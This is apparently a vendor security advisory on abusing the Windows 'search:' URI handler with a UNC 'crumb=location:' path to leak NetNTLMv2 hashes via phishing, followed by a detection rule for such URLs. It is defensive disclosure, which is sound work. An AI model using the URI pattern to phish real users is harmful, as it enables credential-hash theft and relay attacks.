Overview
A new vulnerability was discovered by Huntress that led to NetNTLMv2 victims’ hash leakages, which could be further used to log in as the user either by relay attack or offline cracking of the hash to get the user’s password.
Summary
It was discovered that the “search” Windows URI handler , which allows applications to directly open the Windows Search window with a specific query, can be abused to point to a UNC path (e.g., \\10.9.8.7), which may host an SMB server.
An attacker could trick a victim into executing the search handler, causing the victim’s device to interact with the attacker’s controlled SMB server which will force the victim’s device to initiate a NetNTLM authentication process so, the NetNTLM hash could be exposed and subsequently used in a NetNTLM relay attack or cracked to recover the victim’s pasword.
Background
This section is about unserstanding the meaning of Windows URI Hanlders, NetNTLM Protocol, and the relay attack, if you understand those concepts you can bypass this section.
Windows URI Handlers
Windows utilizes a mechanism called Windows URI Handlers, which is multiple prefix known as URI handlers such as http:, https:, search:, and search-ms:. Windows recognizes each handler and associates it with the application or component responsible for processing it.
The mapping between a URI handler and its corresponding application is stored in the Windows Registry.
For example:
URI Handler: http
Registry Path:
HKEY_CLASSES_ROOT\http\shell\open\command
Registry Value:
DelegateExecutewhich points to a CLSID (Class Identifier), which references a COM object responsible for handling the execution of the URI.
When a user clicks an http:// link, Windows resolves the associated CLSID, invokes the corresponding COM component, and passes the URI to it for processing, ultimately launching the default web browser and opening the requested URL.
NetNTLMv2
NetNTLM is a Windows authentication protocol based on a challenge-response mechanism. When a user attempts to access a server, the server sends a challenge (typically 8 bytes of random data) to the client. The user then uses hash this challange using his password an HMAC-based cryptographic function – hash function with a key, the key would be the user’s NTLM hash- and sends the result back to the server.
The server performs the same calculation using the stored users’ hashes and compares the generated value with the response received from the client. If the two values match, the session is authenticated.
NetNTLMv2 Relay Attack
This attack relies on relaying the NetNTLMv2 challenge-response authentication process between a victim and a target server through an attacker-controlled system.
Once the victim clicks a malicious link and initiates a NetNTLMv2 authentication request to the attacker’s server. Instead, the attacker forwards the authentication process to another server they wish to access. The target server responds with a challenge, which the attacker relays back to the victim. and complete this man-in-the-middle attack to the end of the protocol.
Vulnerability
The windows URI handler “search” works as follows:
search:query=dPhishFiles&crumb=location:C:\Users\dPhish
it was discovered that the “location:” could be pointed to a UNC path.
The attacker can deliver this via phishing email directly contains URL points to the search URI handler, or a regular Phishing Page contains the URI handler
Detection
Detection should be made over
1. Email contains a url contains “search and crumb and \\”
2. URL contains an ancor tag points to “search and crumb and \\”
Discover Rules
id: “1aeecf9a-edae-49ac-b824-1f2e3351d9af”name: “Search Windows URI Handler: NetNTLM Hash Leakage”description: “Detects email that contains URL points to search URI Handlers.”rule_engine: “Atomic”category: “URL”version: 1score: 70confidence: 100severity: “High”detection:all:– urls.url: {icontains: “search”}– urls.url: {icontains: “crumb”}– urls.url: {icontains: “\\”}
dPhish Discover Cloud customers are automatically protected, as detection rules are distributed across all tenant environments.
For on-premises deployments, including air-gapped environments, customers can obtain the latest detection rules through their assigned Technical Account Manager (TAM).